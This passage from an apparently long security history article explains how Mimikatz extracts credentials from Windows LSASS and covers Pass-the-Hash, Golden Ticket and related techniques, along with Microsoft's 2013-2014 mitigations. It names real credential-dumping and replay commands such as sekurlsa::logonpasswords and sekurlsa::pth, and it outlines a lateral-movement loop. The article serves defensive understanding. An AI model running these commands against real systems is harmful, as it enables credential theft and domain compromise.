&lt;p&gt;Benjamin Delpy describes Mimikatz, in Andy Greenberg&apos;s Wired profile, as &quot;a side project to learn C&quot; [@greenberg-mimikatz-wired]. The reader&apos;s natural reaction -- a side project that broke a decade of Microsoft&apos;s most ambitious hardening programme? -- is precisely the point.&lt;/p&gt;
&lt;h3&gt;4.1 Delpy, LSASS, and the May 2011 release&lt;/h3&gt;
&lt;p&gt;Delpy was at the time an IT manager at a French government institution he declines to name [@greenberg-mimikatz-wired]. He had become curious about an architectural quirk: Windows could prompt for his password at logon, then later authenticate him to remote servers (IIS via HTTP Digest, SMB via NTLM or Kerberos) without ever asking again. Something inside the OS had to hold a recoverable form of his password. He started reverse-engineering the Local Security Authority Subsystem Service (LSASS) and the authentication packages and security support providers loaded into it.&lt;/p&gt;

A long-lived user-mode Windows process that holds the secrets the operating system needs to satisfy single sign-on across SMB, RPC, HTTP, RDP, IIS, and MS-SQL without re-prompting the user. By design, LSASS caches NT hashes, Kerberos Ticket-Granting Tickets, and (depending on the loaded security packages) recoverable plaintext credentials [@ms-credentials-processes]. It is the load-bearing target of every credential-extraction tool the next decade produces.
&lt;p&gt;The architectural quirk was structural, not accidental. The single sign-on contract requires the operating system to &lt;em&gt;re-authenticate&lt;/em&gt; the user to network services, and the network protocols of the 1990s and 2000s (NTLM, Kerberos, HTTP Digest, MS-CHAP) all required either a hash, a ticket, or a recoverable plaintext to do that re-authentication [@ms-credentials-processes]. LSASS held all three. There was no way to satisfy the contract without holding the secret in some recoverable form inside an LSASS-controlled memory region.&lt;/p&gt;
&lt;p&gt;Delpy released the first version of Mimikatz in May 2011 as closed-source software [@greenberg-mimikatz-wired; @wikipedia-mimikatz].Delpy describes Mimikatz as &quot;a side project to learn C&quot; in the Wired profile; the framing matters because it underlines that breaking Windows credential security at this depth did not require nation-state resources -- a single engineer with a debugger could do it. Microsoft&apos;s response to his initial private disclosure had been, in his telling, that &quot;you don&apos;t want to fix it&quot;; he made the tool public to force the conversation. The GitHub repository &lt;code&gt;gentilkiwi/mimikatz&lt;/code&gt; was created on April 6, 2014 at 18:30:02 UTC -- the API-verifiable timestamp [@mimikatz-github]. Any &quot;Mimikatz first released in 2007&quot; claim refers to Delpy&apos;s pre-release private experimentation, not a public release.&lt;/p&gt;
&lt;h3&gt;4.2 Four primitives that broke the credential layer&lt;/h3&gt;
&lt;p&gt;The Mimikatz module set Delpy authored over 2011-2014 contains four primitives that together explain why every per-binary mitigation Microsoft had shipped was insufficient.&lt;/p&gt;

Replay an NT hash as a bearer credential against any service that accepts NTLM authentication, *without* ever knowing the user&apos;s plaintext password [@mimikatz-github; @duckwall-campbell-bh2013]. The NTLM protocol authenticates by proof-of-possession of the NT hash, not proof-of-knowledge of the password.
&lt;p&gt;&lt;a href=&quot;https://paragmali.com/blog/ntlmless-the-death-of-ntlm-in-windows/&quot; rel=&quot;noopener&quot;&gt;Pass-the-Hash&lt;/a&gt; is the load-bearing primitive. NTLM authentication on the wire authenticates by proof-of-possession of the NT hash, not proof-of-knowledge of the password. The plaintext password is computed exactly once, at logon, to derive the NT hash via &lt;code&gt;MD4(UTF16LE(password))&lt;/code&gt;. After that the operating system does not need the cleartext again for NTLM. Anyone holding the hash can authenticate as the user without ever knowing the password. The real NTLMv2 protocol per MS-NLMP §3.3.2 is a two-stage HMAC-MD5 construction [@ms-nlmp-ntlmv2]: stage 1 derives an intermediate &lt;code&gt;NTOWFv2 = HMAC_MD5(NT_hash, UTF16LE(UPPERCASE(user) || domain))&lt;/code&gt;; stage 2 computes &lt;code&gt;NTProofStr = HMAC_MD5(NTOWFv2, ServerChallenge || ClientChallengeBlob)&lt;/code&gt;. The bearer-credential invariant survives both stages -- the function consumes the NT hash directly and never references the cleartext -- which is the exact property Pass-the-Hash exploits.&lt;/p&gt;
&lt;p&gt;{`
// Illustrative -- the real NTLMv2 protocol is a two-stage HMAC-MD5
// construction (see MS-NLMP section 3.3.2):
//   Stage 1: NTOWFv2 = HMAC_MD5(NT_hash, UPPERCASE(user) || domain)
//   Stage 2: NTProofStr = HMAC_MD5(NTOWFv2, ServerChallenge || temp)
// The Pass-the-Hash invariant -- that the NT hash is the bearer
// credential because the protocol consumes it without ever needing
// the cleartext password -- survives the simplification below.
const crypto = require(&apos;crypto&apos;);&lt;/p&gt;
&lt;p&gt;function ntlmResponse(ntHash, serverNonce, clientNonce) {
  // Simplified single-stage HMAC-MD5 keyed on the NT hash.
  // The plaintext password is never used by the protocol after logon.
  const hmac = crypto.createHmac(&apos;md5&apos;, Buffer.from(ntHash, &apos;hex&apos;));
  hmac.update(Buffer.concat([serverNonce, clientNonce]));
  return hmac.digest(&apos;hex&apos;);
}&lt;/p&gt;
&lt;p&gt;const stolenHash = &apos;8846f7eaee8fb117ad06bdd830b7586c&apos;;
const serverNonce = Buffer.from(&apos;0123456789abcdef&apos;, &apos;hex&apos;);
const clientNonce = Buffer.from(&apos;fedcba9876543210&apos;, &apos;hex&apos;);&lt;/p&gt;
&lt;p&gt;console.log(&apos;NTLM response:&apos;, ntlmResponse(stolenHash, serverNonce, clientNonce));
console.log(&apos;No plaintext password was used. The hash IS the credential.&apos;);
`}&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The plaintext password is not the secret. Once the operating system has derived the hash at logon, anyone who reaches LSASS and reads that hash can authenticate as the user against any NTLM-accepting service for as long as that hash remains valid -- which is until the user next changes the password. The credential-replay class is a corollary of this single insight applied to different bearer credentials.&lt;/p&gt;
&lt;/blockquote&gt;

Extract a Kerberos Ticket-Granting Ticket or service ticket from LSASS and re-import it into another logon session for replay. Mimikatz exposes both halves: `sekurlsa::tickets /export` extracts; `kerberos::ptt` re-imports [@mimikatz-github].
&lt;p&gt;Pass-the-Ticket is the Kerberos analogue of Pass-the-Hash. A Kerberos TGT is a bearer credential by design -- it proves the holder authenticated to the Key Distribution Center -- and like the NT hash, anyone holding the ticket can replay it. Mimikatz&apos;s &lt;code&gt;kerberos::ptt&lt;/code&gt; injects a ticket blob into the local session&apos;s ticket cache; the next call to &lt;code&gt;klist&lt;/code&gt; shows it as if the local logon had earned it.&lt;/p&gt;

Use a stolen NT hash to request a *fresh* Kerberos TGT from the Key Distribution Center -- the bridge from an NTLM-recovered hash to a Kerberos-issued ticket. Defeats estates that have disabled NTLM but trust Kerberos pre-authentication keys derived from the same password hash [@mimikatz-github].
&lt;p&gt;Overpass-the-Hash is the bridge primitive. Estates that disabled NTLM in 2012-2014 in response to early Pass-the-Hash discussion believed they had closed the credential-replay door. Overpass-the-Hash re-opened it by using the NT hash directly as the RC4-HMAC Kerberos key to encrypt the pre-authentication timestamp, then sending a normal Kerberos AS-REQ. Where the KDC still accepted RC4, it issued a TGT keyed on the same secret the NTLM stack had used. From there, every subsequent Kerberos service ticket request was a legitimate Kerberos exchange backed by a stolen secret.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;WDigest plaintext-in-memory&lt;/strong&gt; is the fourth primitive, and the one that surprised even Microsoft&apos;s own teams when Delpy demonstrated it. Microsoft&apos;s WDigest Security Support Provider, which implemented HTTP Digest authentication on the server side and Digest single sign-on on the client side, held the user&apos;s plaintext password in LSASS memory by design, recoverable as long as the user&apos;s session was active.WDigest predates the modern web; HTTP Digest authentication had been essentially deprecated by the time Mimikatz operationalised the plaintext-recovery primitive, which is why the KB2871997 opt-out has near-zero operational downside on any post-2010 estate. Mimikatz&apos;s &lt;code&gt;sekurlsa::logonpasswords&lt;/code&gt; enumerated the loaded authentication packages and security support providers, located their logon-session structures in LSASS memory, and printed every cached secret it could decrypt -- including, on most pre-2014 estates, the user&apos;s plaintext password in clear text.&lt;/p&gt;
&lt;p&gt;(One discipline note. Skeleton Key is &lt;em&gt;not&lt;/em&gt; one of the Part 3 Mimikatz primitives. Skeleton Key was disclosed by Dell SecureWorks Counter Threat Unit on January 12, 2015 [@secureworks-skeleton-key] and Delpy added &lt;code&gt;misc::skeleton&lt;/code&gt; to Mimikatz on January 17, 2015, both outside the Part 3 window. It opens Part 4.)&lt;/p&gt;

sequenceDiagram
    participant Op as Operator (Admin)
    participant Mim as mimikatz.exe
    participant Krn as Windows Kernel
    participant LSA as LSASS.exe
    Op-&amp;gt;&amp;gt;Mim: privilege::debug
    Mim-&amp;gt;&amp;gt;Krn: AdjustTokenPrivileges (SeDebugPrivilege)
    Krn--&amp;gt;&amp;gt;Mim: TRUE
    Op-&amp;gt;&amp;gt;Mim: sekurlsa::logonpasswords
    Mim-&amp;gt;&amp;gt;Krn: OpenProcess (PROCESS_VM_READ on LSASS PID)
    Krn--&amp;gt;&amp;gt;Mim: process handle
    Mim-&amp;gt;&amp;gt;LSA: ReadProcessMemory (walk security-package list)
    LSA--&amp;gt;&amp;gt;Mim: encrypted credential blobs
    Mim-&amp;gt;&amp;gt;Krn: BCryptDecrypt (LSA master key from same address space)
    Krn--&amp;gt;&amp;gt;Mim: cleartext NT hashes, TGTs, WDigest plaintexts
    Mim--&amp;gt;&amp;gt;Op: print every cached secret
&lt;h3&gt;4.3 The 2013 inflection: graph-walking offensive Active Directory&lt;/h3&gt;
&lt;p&gt;In August 2013, Skip Duckwall and Chris Campbell delivered &quot;Pass-the-Hash 2: The Admin&apos;s Revenge&quot; at Black Hat USA [@duckwall-campbell-bh2013]. The talk did not invent the primitives Mimikatz had already shipped. It made offensive Active Directory tradecraft a public, named discipline by formalising the graph-walking insight: every Windows host an administrator logs into caches a credential for that administrator; every credential cached on a compromised host is a stolen credential; every stolen credential is a new starting node for the next lateral movement. The attack graph closes on the domain controller within hops measured in single digits on almost every real enterprise estate.&lt;/p&gt;
&lt;p&gt;The discipline decomposes into a four-step iterative loop on any Windows estate with cached domain credentials [@duckwall-campbell-bh2013]. &lt;strong&gt;Step one: enumerate active sessions on the compromised host&lt;/strong&gt; -- &lt;code&gt;NetSessionEnum&lt;/code&gt; returns inbound SMB sessions, &lt;code&gt;NetWkstaUserEnum&lt;/code&gt; returns the logged-on user list (pre-KB4480964 without admin rights), and &lt;code&gt;quser&lt;/code&gt; / &lt;code&gt;qwinsta&lt;/code&gt; enumerate interactive logons. The output is the &lt;code&gt;(user, host)&lt;/code&gt; tuple set representing every credential cached in the host&apos;s LSASS. &lt;strong&gt;Step two: identify a reachable administrator&lt;/strong&gt; -- cross-reference each enumerated user against local Administrators group membership and against the domain groups that grant administrative access to a higher-tier host. The output is a set of &lt;code&gt;(harvested-user, target-host)&lt;/code&gt; tuples where the harvested credential can be replayed against the target with administrative privilege. &lt;strong&gt;Step three: Pass-the-Hash to the higher-tier host&lt;/strong&gt; -- inject the harvested NT hash into a new logon session via &lt;code&gt;sekurlsa::pth /run:...&lt;/code&gt; and execute remote commands against the target as the harvested user, with no need for the cleartext password [@mimikatz-github]. &lt;strong&gt;Step four: harvest the new host&apos;s LSASS and repeat&lt;/strong&gt; -- &lt;code&gt;sekurlsa::logonpasswords&lt;/code&gt; against the new beachhead dumps every credential that host has cached, each becoming a new starting node for the next iteration. The loop terminates when one harvested credential is a Domain Admin.&lt;/p&gt;
&lt;p&gt;This four-step loop is the &lt;em&gt;implicit&lt;/em&gt; graph the article&apos;s diagram illustrates: vertices are users and hosts, edges are &lt;code&gt;MemberOf&lt;/code&gt; (user is a group member), &lt;code&gt;AdminTo&lt;/code&gt; (user has administrative access to a host), and &lt;code&gt;HasSession&lt;/code&gt; (a host currently caches a credential for a user). Three years later, Andy Robbins, Will Schroeder, and Rohan Vazarkar productized this graph at DEF CON 24 in Las Vegas on August 6, 2016 as &lt;a href=&quot;https://paragmali.com/blog/ad-is-a-graph-how-bloodhound-made-defenders-think-like-attac/&quot; rel=&quot;noopener&quot;&gt;BloodHound&lt;/a&gt;, which uses the &lt;code&gt;SharpHound&lt;/code&gt; collector to enumerate every vertex and edge, loads them into a Neo4j database, and runs Cypher shortest-path queries from any compromised principal to the &lt;code&gt;Domain Admins&lt;/code&gt; group [@bloodhound-defcon24]. BloodHound is a 2016 artifact and properly belongs to Part 4; for the 2009-2014 Part 3 window, the graph existed only in operator notebooks and on Duckwall and Campbell&apos;s whiteboard, but every Windows estate already had it -- the attacker just had to walk it.&lt;/p&gt;
&lt;h3&gt;4.4 The 2014 inflection: the Golden Ticket&lt;/h3&gt;
&lt;p&gt;In August 2014, Benjamin Delpy and Skip Duckwall jointly presented &quot;Abusing Microsoft Kerberos: Sorry You Guys Don&apos;t Get It&quot; at Black Hat USA [@delpy-duckwall-bh2014].The dual authorship matters: Delpy and Duckwall presented the talk together, and any single-author attribution misses the collaboration that produced the Golden Ticket walkthrough. The headline reveal was the &lt;strong&gt;Golden Ticket&lt;/strong&gt;: a forged Kerberos Ticket-Granting Ticket signed with the domain&apos;s stolen &lt;code&gt;krbtgt&lt;/code&gt; key (classically the NT hash, which is the RC4-HMAC key, or the krbtgt AES keys on AES-enabled domains).&lt;/p&gt;

A forged Kerberos Ticket-Granting Ticket signed with the domain&apos;s stolen krbtgt key material (the RC4-HMAC key equal to the NT hash, or the krbtgt AES keys). Grants arbitrary user, arbitrary group, and arbitrary lifetime impersonation across every domain controller in the Active Directory forest. Survives every password reset *except* the krbtgt account&apos;s own [@delpy-duckwall-bh2014; @metcalf-golden-ticket].
&lt;p&gt;The &lt;a href=&quot;https://paragmali.com/blog/krbtgt-the-account-that-owns-active-directory/&quot; rel=&quot;noopener&quot;&gt;krbtgt account&lt;/a&gt; is the master signing key for the domain&apos;s Kerberos infrastructure. Every TGT a domain controller issues is encrypted and signed with a krbtgt long-term key (RC4-HMAC, which is the NT hash, or AES), and the domain trusts any TGT that verifies against that key. If an attacker holding domain-admin privileges has ever extracted the krbtgt hash from a domain controller&apos;s LSASS, they can forge a TGT for any user, with any group membership, with any lifetime they choose -- and the domain controllers will accept it as if it had been legitimately issued. The forged ticket survives every routine password reset on the domain because routine password resets do not rotate the krbtgt account. Sean Metcalf&apos;s ADSecurity walkthrough remains the practitioner-grade canonical reference [@metcalf-golden-ticket].&lt;/p&gt;
&lt;h3&gt;4.5 What this proved&lt;/h3&gt;
&lt;p&gt;By the end of 2014, the Mimikatz codebase had operationalised pass-the-hash, pass-the-ticket, overpass-the-hash, WDigest plaintext recovery, and the Golden Ticket on a default-configured modern Windows host. Every credential the LSA process held in memory in a recoverable form was structurally exposed.&lt;/p&gt;
&lt;p&gt;The scope of that claim matters. TPM-bound keys, smart-card private keys behind a hardware boundary, and Kerberos service keys on Windows servers whose LSASS the attacker had not yet compromised were &lt;em&gt;not&lt;/em&gt; exposed by Mimikatz. The precise statement is &lt;em&gt;every credential the LSA process held in memory in a recoverable form&lt;/em&gt;, not &quot;every Windows credential primitive ever,&quot; and the precise statement is the one Microsoft eventually acknowledged in the Mitigating Pass-the-Hash whitepaper series [@ms-pth-v2].&lt;/p&gt;

Mimikatz did not need to defeat AppLocker, ASLR, DEP, or Authenticode. It ran as an administrator, called OpenProcess on LSASS, and walked away with every cached credential the operating system would ever hold. The defender&apos;s playbook had been answering the wrong question.
&lt;p&gt;Stuxnet was a four-zero-day operation that ran once. Mimikatz was a free, open-source command that ran every time. The offensive economics of attacking Windows fleets shifted decisively away from zero-day-burning and toward credential replay. &lt;em&gt;Why&lt;/em&gt; did this happen, and what does it mean for the next decade of Windows defence?&lt;/p&gt;
&lt;h2&gt;5. The Causal Link: Hardening Birthed the Credential-Theft Class&lt;/h2&gt;
&lt;p&gt;After two parallel narratives, the reader has the evidence to follow the argument. This is the article&apos;s intellectual centre.&lt;/p&gt;
&lt;h3&gt;5.1 The pivot up the trust stack&lt;/h3&gt;
&lt;p&gt;While Microsoft was closing per-binary attack surface -- Authenticode, kernel-mode code signing, ASLR, DEP, AppLocker, AppContainer, ELAM, Secure Boot -- attackers pivoted up the trust stack to what those hardened binaries still had to trust: the credentials in LSASS memory, the Kerberos tickets in the LSA cache, and the LSA process address space itself. The mitigation surface and the attack surface are not at the same layer. This is the article&apos;s structural insight, and it is the single sentence the rest of the argument exists to defend.&lt;/p&gt;

flowchart TD
    A[&quot;Hardware root: TPM, UEFI Secure Boot db/dbx&quot;]
    B[&quot;Bootloader signature chain (Secure Boot, Measured Boot)&quot;]
    C[&quot;Kernel-mode code (KMCS, ELAM as first boot-start driver, PatchGuard)&quot;]
    D[&quot;User-mode signed binaries (Authenticode, AppLocker rules)&quot;]
    E[&quot;Sandboxed renderers (AppContainer, EPM, WinRT)&quot;]
    F[&quot;LSASS process memory: NT hashes, Kerberos TGTs, krbtgt key&quot;]
    G[&quot;Attacker primitive: Mimikatz sekurlsa::logonpasswords&quot;]
    A --&amp;gt; B --&amp;gt; C --&amp;gt; D --&amp;gt; E --&amp;gt; F
    G -.reads.-&amp;gt; F
    style F fill:#fde68a,stroke:#b45309,color:#5f370e
    style G fill:#fecaca,stroke:#991b1b,color:#7f1d1d
&lt;p&gt;The diagram makes the asymmetry visible. Every defender control protects a layer &lt;em&gt;below&lt;/em&gt; LSASS. Mimikatz attacks LSASS directly. None of the per-binary controls is in the attack path because Mimikatz does not need to defeat them -- it runs as a process the per-binary controls approved.&lt;/p&gt;
&lt;h3&gt;5.2 The Mimikatz codebase as a single causal node&lt;/h3&gt;
&lt;p&gt;Every credential-replay class that defines the next decade of red-team tradecraft traces to one 2011 codebase. Pass-the-Hash, Pass-the-Ticket, Overpass-the-Hash, Golden Ticket -- all four landed in &lt;code&gt;gentilkiwi/mimikatz&lt;/code&gt;. After the GitHub repository creation on April 6, 2014 [@mimikatz-github], the same codebase later grew the post-Part-3 modules (Skeleton Key and DCSync; see §11 FAQ) [@secureworks-skeleton-key; @metcalf-dcsync]. There is no comparable single codebase on the defender side. Microsoft&apos;s countermeasures landed across at least three product teams (Active Directory, Windows Defender, Hyper-V), and the architectural answer required a hypervisor.&lt;/p&gt;

Because you don&apos;t want to fix it, I&apos;ll show it to the world to make people aware of it. -- Benjamin Delpy [@greenberg-mimikatz-wired]
&lt;p&gt;Delpy&apos;s framing converted a defender&apos;s blind spot into a public, weaponised primitive. Microsoft&apos;s initial dismissal of his private disclosure -- that the credential model was &quot;by design&quot; -- was true, in the most damaging possible sense. The model &lt;em&gt;was&lt;/em&gt; by design. The single sign-on contract required it. Closing the gap required a different design.&lt;/p&gt;
&lt;h3&gt;5.3 The economic argument&lt;/h3&gt;
&lt;p&gt;The shift was economic as much as architectural. A reliable Windows zero-day exploit chain commanded a substantial unit price on the early-2010s grey market and burned on first use: once a sample was disclosed and patched, the exploit was worthless to a serious operator. A Mimikatz invocation, by contrast, is free, reusable indefinitely on any pre-Credential-Guard estate, leaves no on-disk footprint, and runs as the operator the attacker already compromised. The asymmetry is not subtle.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Property&lt;/th&gt;
&lt;th&gt;Stuxnet (June 2010)&lt;/th&gt;
&lt;th&gt;Mimikatz (May 2011 onward)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Attacker cost&lt;/td&gt;
&lt;td&gt;Four Windows zero-days + two stolen Authenticode certificates + ICS payload [@symantec-stuxnet-dossier-v14]&lt;/td&gt;
&lt;td&gt;Free open-source tool [@mimikatz-github]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Reusability&lt;/td&gt;
&lt;td&gt;Single-use; zero-days patched within months [@ms-bulletin-ms10-046; @ms-bulletin-ms10-061; @ms-bulletin-ms10-073; @ms-bulletin-ms10-092]&lt;/td&gt;
&lt;td&gt;Indefinite on any pre-Credential-Guard host&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;On-disk footprint&lt;/td&gt;
&lt;td&gt;Multi-megabyte signed dropper + Step 7 / S7 payloads&lt;/td&gt;
&lt;td&gt;Single executable; can run in memory&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Detection footprint&lt;/td&gt;
&lt;td&gt;Symantec / Kaspersky / ESET signatures within weeks of disclosure [@symantec-stuxnet-dossier-v14]&lt;/td&gt;
&lt;td&gt;Initially evades signature-based AV; later detected via ProcessAccess masks on LSASS&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Target population&lt;/td&gt;
&lt;td&gt;Specific ICS estate (Natanz)&lt;/td&gt;
&lt;td&gt;Every Windows AD estate&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Threat-model implication&lt;/td&gt;
&lt;td&gt;Nation-states will burn zero-days for kinetic effect&lt;/td&gt;
&lt;td&gt;Anyone with admin can replay every cached credential&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Defensive success at one layer reliably produces attacker innovation at the next layer up. The 2009-2014 window proves it: Microsoft killed the rootkit, bootkit, and unsigned-bootloader classes; attackers responded by reading the credentials in LSASS memory that every hardened binary still had to trust. The mitigation surface and the attack surface were not at the same layer.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If the credential layer was structurally broken, why didn&apos;t Microsoft just fix it? They tried. The next section is the honest evaluation of Microsoft&apos;s counter-pivot through November 2014.&lt;/p&gt;
&lt;h2&gt;6. Microsoft&apos;s Counter-Pivot: 2013-2014&lt;/h2&gt;
&lt;p&gt;Microsoft was not asleep. By Windows 8.1 General Availability on October 17, 2013, three controls landed that were &lt;em&gt;directly&lt;/em&gt; a response to Mimikatz. They were partial wins, all of them; the architectural acknowledgement that LSASS-in-VTL0 was unsalvageable would arrive only with Virtualisation-Based Security and Credential Guard in Windows 10 1507 [@ms-credential-guard], outside this article&apos;s window. This section is the honest evaluation of what shipped, what it accomplished, and why none of it was enough.&lt;/p&gt;
&lt;h3&gt;6.1 Restricted Admin RDP&lt;/h3&gt;
&lt;p&gt;&lt;a href=&quot;https://paragmali.com/blog/rdp-authentication-26-years/&quot; rel=&quot;noopener&quot;&gt;Restricted Admin RDP&lt;/a&gt; changes the Remote Desktop Protocol so that the client never sends the user&apos;s plaintext password to the server&apos;s LSASS [@kb2871997]. Instead, the server issues a Network Level Authentication challenge that the client signs using its local NT hash; the user authenticates to the remote desktop session as a network logon rather than an interactive logon. Critical credential material is never present on the RDP server.&lt;/p&gt;
&lt;p&gt;The bug Restricted Admin closes is the credential-disclosure failure mode: a foothold on the RDP server used to learn every administrator&apos;s plaintext password as they logged in. The bug it leaves open is replay. A Restricted Admin RDP session is a &lt;em&gt;network&lt;/em&gt; logon, and an attacker holding the NT hash for an administrative account can invoke &lt;code&gt;sekurlsa::pth /run:&quot;mstsc /restrictedadmin&quot;&lt;/code&gt; from a compromised host and authenticate to the target RDP server using only the hash. Restricted Admin reduced disclosure; it did not close replay.&lt;/p&gt;

sequenceDiagram
    participant C as RDP Client
    participant S as RDP Server (LSASS)
    Note over C,S: Classic RDP (credential delegation)
    C-&amp;gt;&amp;gt;S: TLS handshake plus plaintext credentials
    S-&amp;gt;&amp;gt;S: LSASS caches plaintext password for session
    Note over S: Foothold on server reveals every admin password
    Note over C,S: Restricted Admin RDP (post-KB2871997)
    C-&amp;gt;&amp;gt;S: Network Level Authentication challenge request
    S-&amp;gt;&amp;gt;C: server nonce
    C-&amp;gt;&amp;gt;C: sign nonce with local NT hash
    C-&amp;gt;&amp;gt;S: signed response
    S-&amp;gt;&amp;gt;S: verify against domain controller
    Note over S: Server never sees plaintext
    Note over C: Attacker with NT hash can still run mstsc with restrictedadmin
&lt;p&gt;Server-side Restricted Admin shipped at Windows 8.1 / Server 2012 R2 General Availability on October 17, 2013. The client-side back-port to Windows 7, Server 2008 R2, Windows 8, and Server 2012 followed via KB2871997 on May 13, 2014 [@kb2871997], which is also where the WDigest opt-out and TokenLeakDetectDelaySecs primitives shipped.&lt;/p&gt;
&lt;h3&gt;6.2 LSA Protected Process (RunAsPPL)&lt;/h3&gt;
&lt;p&gt;&lt;a href=&quot;https://paragmali.com/blog/protected-process-light-when-the-administrator-isnt-enough/&quot; rel=&quot;noopener&quot;&gt;LSA Protected Process&lt;/a&gt; loads LSASS as a Protected Process Light with the signer level &lt;code&gt;PsProtectedSignerLsa&lt;/code&gt;. Once Protected, the Windows kernel refuses any &lt;code&gt;OpenProcess(PROCESS_VM_READ)&lt;/code&gt; call against LSASS from a process running at a lower signer level -- including a process running as NT AUTHORITY\SYSTEM with &lt;code&gt;SeDebugPrivilege&lt;/code&gt; [@ms-lsa-protection]. The flag is enabled by setting &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL&lt;/code&gt; to &lt;code&gt;1&lt;/code&gt;. RunAsPPL is the strongest credential-protection primitive Microsoft shipped inside Windows 8.1.&lt;/p&gt;

A kernel-enforced signer level that prevents OpenProcess(PROCESS_VM_READ) and CreateRemoteThread against the protected process from any process running at a lower signer level, regardless of token privileges or session [@itm4n-lsa-protection; @ms-lsa-protection]. The Lsa variant requires every LSA plug-in DLL (SSP, AP, custom credential providers) to itself be signed at a compatible signer level, which is why enabling RunAsPPL on real estates requires an LSA plug-in audit.
&lt;p&gt;The bypass class is Bring Your Own Vulnerable Driver. A malicious kernel-mode driver, loaded through a vulnerable but Microsoft-signed third-party driver that the attacker has placed on disk, can clear the &lt;code&gt;Protection&lt;/code&gt; byte in the kernel &lt;code&gt;EPROCESS&lt;/code&gt; structure for LSASS, after which the &lt;code&gt;OpenProcess(PROCESS_VM_READ)&lt;/code&gt; call succeeds. Mimikatz ships its own kernel driver, &lt;code&gt;mimidrv.sys&lt;/code&gt;, that performs exactly this manipulation [@mimikatz-github]. The structural problem is that RunAsPPL is enforced by the same kernel an attacker is compromising to bypass it; the protection cannot be made strictly stronger inside the same privilege ring than the kernel that enforces it.&lt;/p&gt;

A common misreading is that PPL is a partial Credential Guard, or that Credential Guard replaces PPL. The most useful framing is itm4n&apos;s: *&quot;I noticed that this protection tends to be confused with Credential Guard, which is completely different&quot;* [@itm4n-lsa-protection]. PPL is a same-privilege gate inside VTL0 -- both LSASS and the attacker live in the same kernel address space, and the kernel decides whether to grant a process handle. Credential Guard is a cross-privilege isolation between VTL0 and VTL1 (the Virtual Trust Levels Hyper-V introduces in Windows 10 1507) [@ms-credential-guard]: the credential material lives in a Virtual Secure Mode trustlet (LSAISO) that the VTL0 kernel cannot read because the hypervisor&apos;s Second-Level Address Translation tables deny the mapping. The two controls are complementary -- PPL hardens LSASS against in-VTL0 attackers; Credential Guard moves the high-value secret out of VTL0 entirely. §8.3 develops the cross-privilege isolation argument formally.
&lt;h3&gt;6.3 The Mitigating Pass-the-Hash whitepaper series&lt;/h3&gt;
&lt;p&gt;Microsoft published the Mitigating Pass-the-Hash and Other Credential Theft whitepaper in two versions: v1 in December 2012 from the Trustworthy Computing group [@ms-pth-v1-landing] and v2 in July 2014 [@ms-pth-v2]. There is no v3. Post-2014 guidance migrated into the &lt;em&gt;Securing Privileged Access&lt;/em&gt; online documentation rather than appearing as a numbered v3 PDF, and any &quot;v3 2017&quot; reference is incorrect.&lt;/p&gt;
&lt;p&gt;The v1 paper introduced the tier 0 / tier 1 / tier 2 administrative-account model: separate the accounts that manage the forest (tier 0: domain controllers, AD), the accounts that manage server applications (tier 1: file servers, Exchange, SQL), and the accounts that manage end-user workstations (tier 2: helpdesk, desktop support). The rule is that a tier-N credential must never be exposed on a tier-(N+1) host. The model is sound. The problem is that v1 was recommendations-only with no enforcement primitive inside the operating system, and operators routinely violated tiering (the helpdesk technician fixing the CEO&apos;s laptop with a tier-2 credential and then RDPing to a tier-1 file server exposes the credential at the laptop&apos;s LSASS). The v2 paper integrated the technical D5 controls (RunAsPPL, Restricted Admin, KB2871997) precisely because v1 alone could not move the needle on real estates.&lt;/p&gt;
&lt;h3&gt;6.4 KB2871997 and the WDigest opt-out&lt;/h3&gt;
&lt;p&gt;The May 13, 2014 update KB2871997 is the single most operationally impactful credential-protection control of the entire window [@kb2871997]. It carried three deliverables. First, the Restricted Admin client back-port to Windows 7 / Server 2008 R2 / Windows 8 / Server 2012, which Section 6.1 covers. Second, the &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential = 0&lt;/code&gt; registry default that disabled WDigest plaintext credential storage in LSASS memory on a freshly patched system. Third, the &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\TokenLeakDetectDelaySecs&lt;/code&gt; (default 30 seconds) cleanup of leaked logon-session credentials.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The WDigest opt-out (&lt;code&gt;UseLogonCredential = 0&lt;/code&gt;) has zero operational downside on any post-2010 estate -- HTTP Digest authentication is essentially extinct in the enterprise -- and removes the most-cited credential-recovery primitive Mimikatz used through 2014 [@kb2871997]. It ships with the same back-port that brings Restricted Admin to down-level Windows. There is no defensible argument for not applying it on any supported Windows from 2014 onward.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The WDigest opt-out was buried in the KB2871997 bulletin because the headline framing was Restricted Admin RDP; many 2014-era administrators applied the patch for the RDP fix without realising the WDigest default had also changed [@kb2871997].&lt;/p&gt;
&lt;h3&gt;6.5 The seeds of Credential Guard&lt;/h3&gt;
